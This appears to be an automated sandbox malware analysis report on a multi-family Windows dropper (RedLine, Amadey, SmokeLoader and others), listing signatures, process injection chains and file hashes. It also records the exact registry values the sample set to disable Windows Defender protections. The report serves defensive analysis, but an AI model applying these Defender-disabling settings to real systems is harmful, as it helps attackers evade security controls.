Malware Analysis Report

2025-01-23 09:01

Sample ID 231010-yxgjwaah29
Target fd2fde4b51e79039d00b43f7cd00b31f.exe
SHA256 1055e85f63c4918500650bf56924ee225d9d62db0c778ea8f606f844e6d13bf9
Tags
evasion persistence trojan amadey dcrat glupteba healer redline smokeloader lutyr magia up3 backdoor discovery dropper infostealer loader rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1055e85f63c4918500650bf56924ee225d9d62db0c778ea8f606f844e6d13bf9

Threat Level: Known bad

The file fd2fde4b51e79039d00b43f7cd00b31f.exe was found to be: Known bad.

Malicious Activity Summary

evasion persistence trojan amadey dcrat glupteba healer redline smokeloader lutyr magia up3 backdoor discovery dropper infostealer loader rat spyware stealer

RedLine

Amadey

Detects Healer an antivirus disabler dropper

Glupteba

DcRat

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

Healer

Glupteba payload

Modifies Windows Defender Real-time Protection settings

RedLine payload

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Drops file in Drivers directory

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Windows security modification

Reads user/profile data of web browsers

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

Program crash

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious behavior: MapViewOfSection

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:09

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:09

Reported

2023-10-10 20:13

Platform

win7-20230831-en

Max time kernel

161s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1924 set thread context of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1688 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1688 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1688 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1688 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1688 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1688 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1688 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1584 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 1584 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 1584 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 1584 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 1584 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 1584 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 1584 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 3008 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 3008 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 3008 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 3008 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 3008 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 3008 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 3008 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 2692 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
PID 2692 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
PID 2692 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
PID 2692 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
PID 2692 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
PID 2692 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
PID 2692 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
PID 2692 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 2692 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 2692 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 2692 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 2692 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 2692 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 2692 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\SysWOW64\WerFault.exe
PID 1924 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\SysWOW64\WerFault.exe
PID 1924 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\SysWOW64\WerFault.exe
PID 1924 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\SysWOW64\WerFault.exe
PID 1924 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\SysWOW64\WerFault.exe
PID 1924 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\SysWOW64\WerFault.exe
PID 1924 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\SysWOW64\WerFault.exe
PID 2712 wrote to memory of 2784 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2712 wrote to memory of 2784 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2712 wrote to memory of 2784 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2712 wrote to memory of 2784 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2712 wrote to memory of 2784 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2712 wrote to memory of 2784 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2712 wrote to memory of 2784 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe

"C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 284

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 268

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

MD5 e3f20ad259a862d3cda234b5b25db716
SHA1 da45c1bc0344ee184f7f2f3d6b3a4b0d7cda2e0b
SHA256 4f82b4eaa9ef7dbc28d2c3a1c1b43bfeddfc478e7e8922b680df227b7cbef2af
SHA512 d562a680571d08811c42ed1905dc0524d728428ae9a80d465b6d53a57a6de5dd0522b53da39e3a769ee60faabecc941ce04c484515d604b6e3a4b298e8c9ff4c

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

MD5 e3f20ad259a862d3cda234b5b25db716
SHA1 da45c1bc0344ee184f7f2f3d6b3a4b0d7cda2e0b
SHA256 4f82b4eaa9ef7dbc28d2c3a1c1b43bfeddfc478e7e8922b680df227b7cbef2af
SHA512 d562a680571d08811c42ed1905dc0524d728428ae9a80d465b6d53a57a6de5dd0522b53da39e3a769ee60faabecc941ce04c484515d604b6e3a4b298e8c9ff4c

\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

MD5 e3f20ad259a862d3cda234b5b25db716
SHA1 da45c1bc0344ee184f7f2f3d6b3a4b0d7cda2e0b
SHA256 4f82b4eaa9ef7dbc28d2c3a1c1b43bfeddfc478e7e8922b680df227b7cbef2af
SHA512 d562a680571d08811c42ed1905dc0524d728428ae9a80d465b6d53a57a6de5dd0522b53da39e3a769ee60faabecc941ce04c484515d604b6e3a4b298e8c9ff4c

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

MD5 e3f20ad259a862d3cda234b5b25db716
SHA1 da45c1bc0344ee184f7f2f3d6b3a4b0d7cda2e0b
SHA256 4f82b4eaa9ef7dbc28d2c3a1c1b43bfeddfc478e7e8922b680df227b7cbef2af
SHA512 d562a680571d08811c42ed1905dc0524d728428ae9a80d465b6d53a57a6de5dd0522b53da39e3a769ee60faabecc941ce04c484515d604b6e3a4b298e8c9ff4c

\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

MD5 cc353418f49a51a7bef2afef59ce5071
SHA1 8a48f140bcac612e7701d1fb4f32f24b040fb986
SHA256 e525e5cc3fff370219746ffdea9b7e95157646810707421dc557c940a20cffbd
SHA512 d67c43d9805ac0eff86fc423cd52089e500f633515aa6560cbb86a795737f875c1e4c8590bd97899a40c0f756333f16b651a1bd1da2aaa3053bc59aaf534e9b4

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

MD5 cc353418f49a51a7bef2afef59ce5071
SHA1 8a48f140bcac612e7701d1fb4f32f24b040fb986
SHA256 e525e5cc3fff370219746ffdea9b7e95157646810707421dc557c940a20cffbd
SHA512 d67c43d9805ac0eff86fc423cd52089e500f633515aa6560cbb86a795737f875c1e4c8590bd97899a40c0f756333f16b651a1bd1da2aaa3053bc59aaf534e9b4

\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

MD5 cc353418f49a51a7bef2afef59ce5071
SHA1 8a48f140bcac612e7701d1fb4f32f24b040fb986
SHA256 e525e5cc3fff370219746ffdea9b7e95157646810707421dc557c940a20cffbd
SHA512 d67c43d9805ac0eff86fc423cd52089e500f633515aa6560cbb86a795737f875c1e4c8590bd97899a40c0f756333f16b651a1bd1da2aaa3053bc59aaf534e9b4

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

MD5 cc353418f49a51a7bef2afef59ce5071
SHA1 8a48f140bcac612e7701d1fb4f32f24b040fb986
SHA256 e525e5cc3fff370219746ffdea9b7e95157646810707421dc557c940a20cffbd
SHA512 d67c43d9805ac0eff86fc423cd52089e500f633515aa6560cbb86a795737f875c1e4c8590bd97899a40c0f756333f16b651a1bd1da2aaa3053bc59aaf534e9b4

\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

MD5 fbfba8262cb0687c1616c345893fd7e1
SHA1 18ec2d75f3eaacd497f05d21be556c0ecf760e4c
SHA256 853f57334d5ae888b689559ff4617207736181e8d057985fd02344f335e49f08
SHA512 f760a79089e3ed9162035ccf6e9cb70922fefac79b1418bf71395e943a73da955a0bdd52f2c1d68d2c9cc7bcdcecc8cec23e1a640f875b2d30b26ae3d0da906b

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

MD5 fbfba8262cb0687c1616c345893fd7e1
SHA1 18ec2d75f3eaacd497f05d21be556c0ecf760e4c
SHA256 853f57334d5ae888b689559ff4617207736181e8d057985fd02344f335e49f08
SHA512 f760a79089e3ed9162035ccf6e9cb70922fefac79b1418bf71395e943a73da955a0bdd52f2c1d68d2c9cc7bcdcecc8cec23e1a640f875b2d30b26ae3d0da906b

\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

MD5 fbfba8262cb0687c1616c345893fd7e1
SHA1 18ec2d75f3eaacd497f05d21be556c0ecf760e4c
SHA256 853f57334d5ae888b689559ff4617207736181e8d057985fd02344f335e49f08
SHA512 f760a79089e3ed9162035ccf6e9cb70922fefac79b1418bf71395e943a73da955a0bdd52f2c1d68d2c9cc7bcdcecc8cec23e1a640f875b2d30b26ae3d0da906b

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

MD5 fbfba8262cb0687c1616c345893fd7e1
SHA1 18ec2d75f3eaacd497f05d21be556c0ecf760e4c
SHA256 853f57334d5ae888b689559ff4617207736181e8d057985fd02344f335e49f08
SHA512 f760a79089e3ed9162035ccf6e9cb70922fefac79b1418bf71395e943a73da955a0bdd52f2c1d68d2c9cc7bcdcecc8cec23e1a640f875b2d30b26ae3d0da906b

\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

memory/2560-40-0x00000000003E0000-0x00000000003FE000-memory.dmp

memory/2560-41-0x0000000000880000-0x000000000089C000-memory.dmp

memory/2560-42-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-43-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-45-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-47-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-49-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-51-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-53-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-55-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-57-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-59-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-63-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-69-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-67-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-65-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2560-61-0x0000000000880000-0x0000000000896000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

MD5 9f7da01ebd8a0ab0d1711de39405883d
SHA1 e92b5303fcae4341f66b365e9df00a191e82c59b
SHA256 9a39312d99741edf3f4a575151ee4d46731bb84baba1ed44fd2a00952d1f01d5
SHA512 62ce69db5827f6a88e9bede29431ab1ab4dc1418fbd4a22c6fdc778c9fc1b1223929964d5c65011f288ffb7271a80591f06e4c0c398ce3c98e163eac904e9200

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

MD5 9f7da01ebd8a0ab0d1711de39405883d
SHA1 e92b5303fcae4341f66b365e9df00a191e82c59b
SHA256 9a39312d99741edf3f4a575151ee4d46731bb84baba1ed44fd2a00952d1f01d5
SHA512 62ce69db5827f6a88e9bede29431ab1ab4dc1418fbd4a22c6fdc778c9fc1b1223929964d5c65011f288ffb7271a80591f06e4c0c398ce3c98e163eac904e9200

